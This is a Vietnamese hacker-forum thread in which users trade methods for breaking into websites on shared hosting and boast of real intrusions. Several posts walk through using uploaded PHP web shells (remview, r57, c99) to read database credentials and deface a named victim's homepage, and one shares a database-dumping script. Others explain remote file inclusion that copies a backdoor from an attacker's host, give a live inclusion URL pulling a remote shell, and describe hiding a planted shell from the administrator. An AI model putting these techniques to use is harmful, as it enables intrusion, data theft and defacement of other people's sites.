Latest posts for the topic "Hack local"

Hack local

nln — GMT

Tui up con remview lên host rồi. Run nó, va đã xem được một số pass của SQL victim. Nhưng ko biết drop DB cũng như vào Cpanel. Anh em biết bước tiếp theo làm gì ko? Xem file config được, ko cho edit!

Hack local

Luke — GMT

Đối với người mới tập hack local thì có thể sử dụng phpMyAdmin để access vào Database Thực hiện các lệnh CMD Shell sau $ cd Download phpMyadmin về $ wget http://superb-east.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.6.3-pl1.tar.gz Giải nén $ gzip -d < phpMyAdmin-2.6.3-pl1.tar.gz | tar -xfv - Đổi tên thư mục $mv phpMyAdmin-2.6.3-pl1 sql Sau đó dùng chương trình Remview edit file sql/config.inc.php theo thông tin về database mà lấy được Vào phpmyadmin http://victimhost//sql/ Dùng kỹ thuật Meta Tag + HTML Code để deface trang chủ. Ví dụ như qua phpmyadmin edit Site name, Site Description hoặc 1 trường dữ liệu nào dó hiển thị lên trang chủ thành Hacked by xLukeHacked by xLuke
Contact hainamluke@yahoo.com Rồi sau đó xem lại mà xem ^_^ Nếu khá HTML thì dùng DIV, hoặc SWF để deface toàn bộ

Hack local

nln — GMT

Ặc khó hiểu quá huynh. Http://66.246.103.230/~dianguc/rem.php

Hack local

dinhcaohack — GMT

Hacked by xLukeHacked by xLuke
Contact hainamluke@yahoo.com ==> virus GaiXinh huh ? Nghe wen wen :D

Hack local

Luke — GMT

Hix! Tai tiếng!

Hack local

Luke — GMT

Post URL của shell lên các diễn đàn là một việc quá nguy hiểm. May mà mình nhanh tay deface trước và xóa con rem đó rồi! Edit lại trang chủ nhé!

Hack local

dinhcaohack — GMT

May mà mình nhanh tay deface

Nghe cái này hơi chán đấy Đã có ý del shell đi thì deface làm j` :) Hay là lão định .. giữ shell làm của riêng :D

Ặc khó hiểu quá huynh. Http://66.246.103.230/~dianguc/rem.php

Lần sau định hỏi huynh nào thì PM cho huynh ấy, không mấy đệ vào nghịch .. ngượng quá :)

Re: Hack local

nhocbmt — GMT

Code:

$ wget http://superb-east.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.6.3-pl1.tar.gz

Tải lên serv nặng quá dzậy lỡ bị timeout thì sao anh nhĩ ??? Sao ko tự viết 1 file php để select db nho nhỏ :D cần gì mà phải ôm luôn cái phpmyadmin kinh dzậy :D

Hack local

Luke — GMT

Bác ngó xem em deface kiểu gì. Hơi bị lịch sự. @dianguc: Server bảo mật siêu kém. Cho thuê host thế này mất cả chì lẫn chài. Thông báo với thằng server admin là đã mất root, còn vì sao thì: PHP: system ("whoami"); --> dianguc Config kiểu này, bó tay!! Mất nhà là đúng!

Re: Hack local

Luke — GMT

Never timeout vì server của bọn SF quá xịn, file lại quá nhỏ! Hơn nữa cài phpmyadmin chỉ mất chưa đầy 1 phút. Tool lại quá mạnh, chả tội gì đi ngồi code php. Nói thế nhưng có lần mình hack RFI, nó chmod kỹ quá, ko setup duoc phpmyadmin, thế là phải viết MySQL -> XML anh em có anh cần thì dùng nhé :-) Remove một vài dòng lệnh đi là xem scheme ngon ơ, dù sao thì mình cũng rất khoái xem bằng XML ^_^ Code:

\n";
mysql_connect ($dbhost, $dbuser,$dbpass);
mysql_select_db($dbname);
$result = mysql_list_tables($dbname);
$num_rows = mysql_num_rows($result);
for ($i = 0; $i < $num_rows; $i++) {
    $table  = mysql_tablename($result, $i);
    echo "\n";
        $fresult = mysql_query("SHOW COLUMNS FROM $table");
        if (mysql_num_rows($fresult) > 0) {
            $j  = 0;
            while ($frow = mysql_fetch_assoc($fresult)) {
                $field[$j]   = $frow[Field];
                $j++;
            }
            $rresult    = mysql_query("SELECT * FROM $table");
            if (mysql_num_rows($rresult) > 0) {
                echo "";
                while ($row = mysql_fetch_row($rresult)) {
                    echo "";
                    for ($k=0; $k<$j; $k++) echo "<$field[$k]>$row[$k]";
                    echo "";
                }
                echo "";
                
           }
        }        
    echo "";
}
echo "";

?>

Hack local

dinhcaohack — GMT

Tải lên serv nặng quá dzậy lỡ bị timeout thì sao anh nhĩ ???

Nếu server bị time out thì hack làm chi ?? Lởm wa' :D

Bác ngó xem em deface kiểu gì. Hơi bị lịch sự.

Có thấy lão deface đâu nhỉ , chỉ giỏi lừa tôi :">

PHP: system ("whoami");

Nó để thế chỉ sợ report cho chủ server nó lại chẳng hiểu j` :) :D

Hack local

Luke — GMT

Có thấy lão deface đâu nhỉ , chỉ giỏi lừa tôi :">

http://66.246.103.230/~dianguc/ Welcome to TrangDem.Com ...:: Music ::... ...:: Forum ::... Designed: Le Nhat Nam - Security checked: xLuke. . All infomation you can contact to: Y!ID: diangucviet

Hack local

ghostshadow189 — GMT

theo em nếu đã up được shell lên roài thì tha cho người ta , edit cái index thoai chứ drop database làm gì , khổ thân người ta ra :D

Re: Hack local

nhocbmt — GMT

Phỏng vấn anh Luke chút :D Nếu nln ko đưa link rem có sẵn cho bro , thì bro có thể get được nó hông ??? 8) hehe ! Ủa !mà nếu serv dis cmd wget thì sao mà up lên nhĩ :D nếu echo từng mảng lên mà owner là body thì cũng ko run được thì sao luôn nhĩ ???

Re: Hack local

ato — GMT

Có thể dùng con này để connect vao DB,nhỏ gọn hơn là wget toàn bộ phpmysql sang http://rapidshare.de/files/24153994/mysql.php.html

Hack local

Luke — GMT

Nếu ko có link thì việc hack sẽ trở nên khó khăn hơn ++++++ Rất nhiều. Với sức của Luke thì khả năng hack bất cứ site nào cũng có thể là ... không thể ^_^ Nếu không thể dùng được wget thì dùng có thể dùng copy() của PHP, chẳng thằng nào disable cái này cả. Nếu disable tiếp thì dùng fopen(), fwrite().. lâu hơn 1 chút.. Còn nó disable tiếp thì ... nó phá sản vì chẳng thằng nào mua host của nó.

Re: Hack local

Luke — GMT

ato wrote:

Có thể dùng con này để connect vao DB,nhỏ gọn hơn là wget toàn bộ phpmysql sang http://rapidshare.de/files/24153994/mysql.php.html

Nói gì thì nói chứ dùng phpMyAdmin vẫn sướng nhất, mà install bằng shell command, có mất thời gian đâu. Còn nếu dùng 1 file thì Luke khuyên dùng r57 và c99 shell Ưu điểm của r57 là hack theo kiểu RFI rất sướng, ko cần upload ^_^ Tuy nhiên nếu tìm được weak chmod dir thì tương c99 mạnh hơn. Nhất là cái mysql function của nó. kết hợp cả 2 là tuyệt vời nhất Để Luke up demo lên cho mọi người. Đây cũng là một đoạn phim hacking demo rất đáng xem về kỹ thuật tấn công local, chỉ tiếc là nó dùng tiếng (*@&^@#&*^@ http://67.15.40.2/~tranphu/files/r57.rar Mọi người xem thế nào nhé

Hack local

dinhcaohack — GMT

Lão Lúc lắc j` đó ơi :D Tôi chẳng bảo giờ up con phpmyadmin lên làm j` cả, cái j` mà cứ nhanh, dùng tốt là OK hết (r57,c99) .. Dùng phpmyadmin chỉ là tiện ở việc .. UPDATE data một các trực quan, không phải nhớ và type lệnh . Nếu nó dis các hàm thì làm j` (safe mode) có rất nhiều cách .. FTP_connect, copy, PHP-by pass - safe mode etc. nói chung là nhiều kỹ thuật lắm ..

Với sức của Luke thì khả năng hack bất cứ site nào cũng có thể là ... không thể ^_^

Sao lại không thể chứ, cái server lởm òm, config kém :D, local root tự do :)

Hack local

ato — GMT

c99 có giao diện ưa nhìn,nhưng r57 dễ exec hơn.Thực ra cũng tùy từng người nhưng vẫn phải kết hợp mới hay nhất.Con mysql ato giới thiệu ở trên với mục đích không phụ thuộc nhiều lắm vào việc biết query như r57 hay c99,vì có giao diện gần giống phpmysql.Còn 1 con cgitelnet tuy rất mạnh nhưng cũng khó để up,up được thì quả là tuyệt vời.

Hack local

Luke — GMT

Hic Sao cái tên mình lại là Lúc Lắc Có lẽ cái topic này cung cấp quá đủ thông tin về việc hack local rồi. Còn kỹ năng thì phải thực tập nhiều mới biết được. Nhớ hồi đầu, hack local phải include ("/home/.../www/forum/config.php") sau đó up forum mình lên, sửa config cho giống. mãi về sau mới có phpmyadmin, rồi remview khi bị safe mode thì dùng được cgitelnet rồi MySQL LOAD INTO FILE Bây giờ công cụ có sẵn cả, sướng thật ^_^ Dù sao cũng 4 năm rồi Mình già rồi...

Hack local

dinhcaohack — GMT

Lão đúng là Lúc Lắc còn gì nữa Chắc là tại k0 chịu học PHP , để vào DB của người ta dùng mỗi cái hàm mysql_connect() là xong, lão lại còn phpmyadmin với remview làm j` cho khổ .. còn cái include "" cũng hay đó .. mỗi tội nghe sao nó tá điền thế lão :D ====== Còn 1 con cgitelnet tuy rất mạnh nhưng cũng khó để up,up được thì quả là tuyệt vời. ====== Mình là yêu con cgitelnet này nhất :D, đến khi biết Putty rồi cũng thấy hay k0 kém :D Cách upload cgitelnet này cũng dễ thôi lão ạ, nhưng có vẻ dùng back-connect ( netcat + Putty) vẫn hay hơn :| Thâm nhập vẫn chỉ là thâm nhập, hack mới khó :| "Hacking is Get r00t" :D

Hack local

kilua_vniss — GMT

dinh cao hack --->da~ get root :D kilua-->dang tim`hieu r00t la` cai' j` :D hoi luon dch r00t la` cai quai' j` vay buc minh` ghe sao ko type duoc dau' :)

Hack local

Luke — GMT

Khì khì hơn 4 năm trước tớ mới tập tọe PHP, có biết tí gì đâu net thì phải dùng ngoài dịch vụ dial-up chậm hơn rùa Bây giờ thì có đủ lại lười.. ngại nghịch ngợm Đời là thế

Re: Hack local

lonely_Xorhandsome — GMT

Luke wrote:

ato wrote:

Có thể dùng con này để connect vao DB,nhỏ gọn hơn là wget toàn bộ phpmysql sang http://rapidshare.de/files/24153994/mysql.php.html
Nói gì thì nói chứ dùng phpMyAdmin vẫn sướng nhất, mà install bằng shell command, có mất thời gian đâu. Còn nếu dùng 1 file thì Luke khuyên dùng r57 và c99 shell Ưu điểm của r57 là hack theo kiểu RFI rất sướng, ko cần upload ^_^ Tuy nhiên nếu tìm được weak chmod dir thì tương c99 mạnh hơn. Nhất là cái mysql function của nó. kết hợp cả 2 là tuyệt vời nhất Để Luke up demo lên cho mọi người. Đây cũng là một đoạn phim hacking demo rất đáng xem về kỹ thuật tấn công local, chỉ tiếc là nó dùng tiếng (*@&^@#&*^@ http://67.15.40.2/~tranphu/files/r57.rar Mọi người xem thế nào nhé

anh Luke ơi cho em hỏi làm sao ma` khôg cần upload con r57 huặc c99 lên host mà vẫn có thể run nó đươc hén ?anh có thể nó rõ hơn được không ạ , cảm ơn anh nhiều .

Hack local

gamma95 — GMT

lão luke thông cảm ,hồi lão local thì tụi nhỏ chưa bit bắn bi ... nên nhiều khi nghe chúng thảo luận cũng bực mình lém ;))

Hack local

killer_8xF — GMT

noi that nha hack kieu nay neu ko dung bat cu cong cu nao thi kho co the lam duoc

Hack local

dinhcaohack — GMT

anh Luke ơi cho em hỏi làm sao ma` khôg cần upload con r57 huặc c99 lên host mà vẫn có thể run nó đươc hén ?anh có thể nó rõ hơn được không ạ , cảm ơn anh nhiều

Em k0 up 2 cái đấy thì em dùng remview hehe :D

Hack local

jan — GMT

:D hôm nào up mấy host cho anh em thực hành local A.

Hack local

BigballVN — GMT

Hehe. good đấy. Nhanh nhanh nhé

Re: Hack local

nhocbmt — GMT

Nếu ko có link thì việc hack sẽ trở nên khó khăn hơn ++++++ Rất nhiều. Với sức của Luke thì khả năng hack bất cứ site nào cũng có thể là ... không thể ^_^ Nếu không thể dùng được wget thì dùng có thể dùng copy() của PHP, chẳng thằng nào disable cái này cả. Nếu disable tiếp thì dùng fopen(), fwrite().. lâu hơn 1 chút.. Còn nó disable tiếp thì ... nó phá sản vì chẳng thằng nào mua host của nó.

Em đã nói nó ko echo từng mãng lên host ! vậy thì làm sao create được file php để dùng anh ??? Vd bug của phpBB chẳng hạn , nó cho phép mình remote cmd và mình đang có shell trong tay , nhưng shell này quyền hạn rất hạn chế và khó sữ dụng ! Việc của mình bây giờ là cố gắng up 1 con remv php lên host để tiện sữ dụng ! Nhưng oái ăm nó dis wget ? nếu ko có quyền nhất dịnh nó ko cũng cho dùng " echo [content] > file " ! Vậy thì còn cách nào để có 1 remv php lên host ko ????

Hack local

gamma95 — GMT

nhócbmt đọc kĩ lại bài reply của luke ... "dùng hàm copy"

Hack local

nhocbmt — GMT

em vẫn ko hiểu lắm ? anh gamme giải thick dùm em hộ 1 tí được ko ???Dùng lệnh coppy của *nix thì làm được gì ??? Thx anh nhiều !

Hack local

gamma95 — GMT

khổ wá ,copy làm 1 hàm của của PHP chứ không phải của *nix đại loại là nếu 1 ứng dụng nào đó bị remote file include mà việc bạn include backdoor vào ko upload đc gì lên host victim ,thì bạn hãy include 1 file chứa hàm copy để copy con backdoor trên host của bạn về host của victim,tất nhiên folder của victim phải có quyền ghi vd http://site.com/index.php?file=http://host ko support php/hihi.php nội dung file hihi.php lúc đó trên host của victim sẽ có con aboutme.php chính là con remview của chúng ta căn bản là như thế

Hack local

channhua — GMT

khổ wá ,copy làm 1 hàm của của PHP chứ không phải của *nix đại loại là nếu 1 ứng dụng nào đó bị remote file include mà việc bạn include backdoor vào ko upload đc gì lên host victim ,thì bạn hãy include 1 file chứa hàm copy để copy con backdoor trên host của bạn về host của victim,tất nhiên folder của victim phải có quyền ghi vd http://site.com/index.php?file=http://host ko support php/hihi.php nội dung file hihi.php lúc đó trên host của victim sẽ có con aboutme.php chính là con remview của chúng ta căn bản là như thế

bi giờ m mới hiểu :D @luke: cái file 57.rar của bác unrar không đựoc, báo lỗi

Hack local

buileminh — GMT

Nhưng bác cho em hỏi muốn include đươc kiểu này thì cái file index.php phải bị lỗi SQL Injection đúng ko? Nếu nó check input ($_GET['file']) cẩn thận thì ko thể include được đúng ko?

Hack local

Luke — GMT

Nếu check input cần thận thì sẽ không tấn công theo kiều include được, hay còn gọi là RFI (Remote File Inclusion); @channhua: Có người đã download về và chạy ngon Đây là 1 đoạn video hướng dẫn tỷ mỉ cách khai thác local qua r57 và c99 Có lẽ để kết thúc các thắc mắc của các bác Luke up lên 2 đoạn video demo nữa Demo for RFI technique: http://www.igates.net/plumeCms.rar Demo for get Root: http://www.igates.net/root.rar Tuy nhiên Luke cũng sẽ up lại file http://www.igates.net/r57.rar Hy vọng mọi người cảm thấy có ích. Hic, nó dùng toàn tiếng Thổ Nhĩ Kỳ, xem hình chắc mọi người hiểu

Re: Hack local

lonely_Xorhandsome — GMT

rất ...rất cảm ơn anh Dinhcaohack nhiều , em đã thử dùng c99 để hack thử forum kia chư`ng hơn 1 tháng rồi , nhưng cứ tưởng phải up vô host mới practise đuợc, nhờ anh bi giờ mới biết , quả thiệt trời cao :D

Hack local

lonely_Xorhandsome — GMT

gamma95 wrote:

khổ wá ,copy làm 1 hàm của của PHP chứ không phải của *nix đại loại là nếu 1 ứng dụng nào đó bị remote file include mà việc bạn include backdoor vào ko upload đc gì lên host victim ,thì bạn hãy include 1 file chứa hàm copy để copy con backdoor trên host của bạn về host của victim,tất nhiên folder của victim phải có quyền ghi vd http://site.com/index.php?file=http://host ko support php/hihi.php nội dung file hihi.php lúc đó trên host của victim sẽ có con aboutme.php chính là con remview của chúng ta căn bản là như thế

Anh gamma ơi cho em hỏi , em viết hàm copy như anh nói để thử practise trong host của em , em cấp permission write public rồi mà nó còn báo lỗi thế này : Code:

Warning:copy(http://freewebtown.com/tang05/fileremview)[function.copy]:failed to open stream:HTTP wrapper does not support writeable connections in /home/lonely/public_html/attacky.php on line 15

-em dùng 3 host cho mô hình này , 1 host không support chứa remview , host A chứa file attacky.php(em run bị lỗi trên), host B là destination , em dùng copy remview về 1 file php( em config write public ) ==> nhưng có lỗi như trên , mong anh chỉ giúp , cảm ơn anh nhiều !!!

Hack local

dinhcaohack — GMT

Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix :( :(, cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra Có 2 phương pháp nhanh ở việc này : Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke)

Hack local

kilua_vniss — GMT

find /path -perm 2 -ls chú dch quên chưa nói cái nè để kiếm file cho ghi :D cách kia cũng được mà , cái nè đơn giản hơn mà cũng nên bít 1 ít về linux là hiểu thui mà

Re: Hack local

hack2prison — GMT

nhocbmt wrote:

Code:
$ wget http://superb-east.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.6.3-pl1.tar.gz
Tải lên serv nặng quá dzậy lỡ bị timeout thì sao anh nhĩ ??? Sao ko tự viết 1 file php để select db nho nhỏ :D cần gì mà phải ôm luôn cái phpmyadmin kinh dzậy :D

R57shell có thể làm được tất cả công việc thay cho phpMyAdmin. Quan trọng là biết câu lệnh SQL

Hack local

lonely_Xorhandsome — GMT

dinhcaohack wrote:

Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix :( :(, cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra Có 2 phương pháp nhanh ở việc này : Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke)

anh dinhcaohack ơi ! hồi wa em coi cái film demo của may thằng cha kia nó demo , thì thấy dùng hàm include thì chỉ có thể attack mấy cái host free dỏm hay sao a' Code:

http://bacaplume.free.fr/manager/frontinc/prepend.php?_PX_config[manager_path]=http://nhuy.hollosite.com/mshell.txt?

trang đó có mấy thằng turkey nó hack trước rồi , em cũng search theo từ khóa trong film "powered by plume CMS" nhưng không fải host nào cu~ng vô được !!! lâu lâu mới có cái được thôi a' , không biết "plume CMS" là 1 loai forum hay host của công ty nào đó cho thuê ??? theo kinh nghiệm của anh dinhcaohack thì cach dùng "include " để hack những host , huac forum bị lỗi thế nào hả anh ? cảm ơn anh nhiều nhiều lắ'm rất mong nhận được trả lời của anh .

Re: Hack local

gamma95 — GMT

Code:

Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix  , cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra
Có 2 phương pháp nhanh ở việc này :
Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ
Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke)

hô hô ... bạn dch nói chiện nghe huề vốn wá ,vniss ngoài cái trò local ra còn cái fVck gì đâu mà múa lửa ,đi đâu cũng vờnit ,vờnit ! ps:điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng !

Hack local

dinhcaohack — GMT

điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng !

Riêng cái chuyện nói tục chửi bậy là không đủ .. tư cách rồi nhóc ạ :D

trang đó có mấy thằng turkey nó hack trước rồi , em cũng search theo từ khóa trong film "powered by plume CMS" nhưng không fải host nào cu~ng vô được !!! lâu lâu mới có cái được thôi a' , không biết "plume CMS" là 1 loai forum hay host của công ty nào đó cho thuê ??? theo kinh nghiệm của anh dinhcaohack thì cach dùng "include " để hack những host , huac forum bị lỗi thế nào hả anh ? cảm ơn anh nhiều nhiều lắ'm rất mong nhận được trả lời của anh .!

Anh chưa thử xem video :), anh nghĩ chắc cái "plume CMS" dính lỗi include PHP, có thể em không thực hành được là vì bug ấy .. có lâu rồi em ạ, muốn thực hành thì tốt thôi .. cứ 0h30' em ghé qua milw0rm xem có bug PHP Remote Include thì thực hành :"> Còn cái "dùng "include " để hack" không phải như em nghĩ đâu :D, đây là cách nhúng shell vào 1 file PHP trên host victim :), wa vờ nít đi em, anh ngại type bên này lắm :)

Re: Hack local

lonely_Xorhandsome — GMT

gamma95 wrote:

Code:
Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix  , cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra
Có 2 phương pháp nhanh ở việc này :
Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ
Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke)
hô hô ... bạn dch nói chiện nghe huề vốn wá ,vniss ngoài cái trò local ra còn cái fVck gì đâu mà múa lửa ,đi đâu cũng vờnit ,vờnit ! ps:điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng !

các anh ơi ! cho em xin na`o , em cu~ng biết VNIIS rồi có điều ở đây là topic về Hacklocal mà anh , thưc ra forum na`o thi` cũng thế cả , kĩ thuật hack ở viêtnam cũng đều dùng tools, và kĩ thuật của các hacker nước ngoài cả , có điều kĩ thuật nó từ người này qua người khác và phát triển thêm .. ..rất mong các anh tận tình hướng dẫn a ! còn dùng hack làm gì thì em nghĩ cũng là do ý thức của mỗi người cả ! em không có ý gì khác , chỉ mong các anh đoàn kết xây dựng HVA ngày càng mạnh .

Hack local

lonely_Xorhandsome — GMT

dinhcaohack wrote:

điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng !
Riêng cái chuyện nói tục chửi bậy là không đủ .. tư cách rồi nhóc ạ :D
trang đó có mấy thằng turkey nó hack trước rồi , em cũng search theo từ khóa trong film "powered by plume CMS" nhưng không fải host nào cu~ng vô được !!! lâu lâu mới có cái được thôi a' , không biết "plume CMS" là 1 loai forum hay host của công ty nào đó cho thuê ??? theo kinh nghiệm của anh dinhcaohack thì cach dùng "include " để hack những host , huac forum bị lỗi thế nào hả anh ? cảm ơn anh nhiều nhiều lắ'm rất mong nhận được trả lời của anh .!
Anh chưa thử xem video :), anh nghĩ chắc cái "plume CMS" dính lỗi include PHP, có thể em không thực hành được là vì bug ấy .. có lâu rồi em ạ, muốn thực hành thì tốt thôi .. cứ 0h30' em ghé qua milw0rm xem có bug PHP Remote Include thì thực hành :"> Còn cái "dùng "include " để hack" không phải như em nghĩ đâu :D, đây là cách nhúng shell vào 1 file PHP trên host victim :), wa vờ nít đi em, anh ngại type bên này lắm :)

cảm ơn anh nhiều he'n , hồi đêm wa em cu~ng vào milw0rm , và dùng cai include đo'..đo' anh, em nhớ hình như là /exploits/1280 gì đó thì phải ...nhưng khi include rồi , em thưc hiện mấy cái lênh thì nó báo lỗi include(XXX) tùm lum cả , mà em cu~ng không hiểu cái file depend.php nó viết cái gì cả :D , anh có thể chỉ giúp em không ạ ? okis em thử wa vo*` nit ;) thưc ra em là stand_alone bên đó :D , thanks anh nhiều ...

Hack local

Luke — GMT

Anh chỉ nghĩ là, trước khi nghiên cứu về hacking nên trang bị cho mình đầy đủ các kiến thức căn bản đi đã. Anh nghĩ em nên học một ngôn ngữ lập trình cho chắc đã. Bởi vì khi em nắm chắc, trong trường hợp này là PHP. Em sẽ ko cần phải hỏi han nhiều. Mà bây giờ hỏi han chưa chắc em đã nắm được bản chất của vấn đề. Topic này viết về Local Attack thì cũng ko nên quá đi xa về RFI, nếu muốn mọi người có thể mở 1 topic ra. Tránh việc để cho các bài viết HVA trở nên lộn xộn. Cảm ơn.

Hack local

lonely_Xorhandsome — GMT

Luke wrote:

Anh chỉ nghĩ là, trước khi nghiên cứu về hacking nên trang bị cho mình đầy đủ các kiến thức căn bản đi đã. Anh nghĩ em nên học một ngôn ngữ lập trình cho chắc đã. Bởi vì khi em nắm chắc, trong trường hợp này là PHP. Em sẽ ko cần phải hỏi han nhiều. Mà bây giờ hỏi han chưa chắc em đã nắm được bản chất của vấn đề. Topic này viết về Local Attack thì cũng ko nên quá đi xa về RFI, nếu muốn mọi người có thể mở 1 topic ra. Tránh việc để cho các bài viết HVA trở nên lộn xộn. Cảm ơn.

cảm ơn về ý kiến của anh , em cũng đã & đang tự học php qua ebook , nhưng chỉ ở mức thao tác với database và lấy 1 số thông tin phía người dùng , còn network em cũng đã hoc qua các course MCSA , với topic mà anh đưa ra em thấy rất thú vị đó chứ ! em đã thử dùng attack theo kiểu include ngay sau khi tham gia topic này nhưng chỉ áp dụng được cho 1 số host em tìm theo "plume CMS" ,nhưng không thực hiện được lênh shell ???, còn theo cách copy từ remview từ 1 host như các anh hướng dẫn ,em cũng đã thử nhưng cách này chưa thành công (em cũng dùng qua het r57,c99,remview nhưng không nhớ tên chỉ biết nó là backdoor :D) ...qua topic này em muốn tìm hiểu rõ hơn rất mong các anh hướng dẫn nũa ạ :D

Hack local

thelast — GMT

Designed: Le Nhat Nam - Security checked: xLuke & Hacked by quocboy =))

Hack local

lonely_Xorhandsome — GMT

thelast wrote:

Designed: Le Nhat Nam - Security checked: xLuke & Hacked by quocboy =))

cái code source forum nhạc đó là của sweetlove , code của thằng bạn tri kỉ của em :D , thế mà lê nhật nam là ai mà đưa cái bản quyền vào ac' thiệt :D

Hack local

thelast — GMT

Nói làm gì cái thằng ba bứa đó , nó ăn cháo đá bát là tài ....

Hack local

xnohat — GMT

Rõ hay nhỉ chỗ HVA là để khoe chiến tích hay sao mà mang ra đây khoe thế hả Mấy cụ bên BQT sao lại sơ xuất thế này

Hack local

xnohat — GMT

hackernohat wrote:

Rõ hay nhỉ chỗ HVA là để khoe chiến tích các trang web đã bị hack hay sao mà mang ra đây khoe thế ? Mấy cụ bên BQT sao lại sơ xuất thế này

Hack local

dinhcaohack — GMT

Cái thằng hám danh đi chửi 1 lũ hám tài :( Thế giới đảo lộn, chán thật !

Hack local

Mulan — GMT

Chủ đề chệch hướng rồi. Lock vào nhá các đồng chí.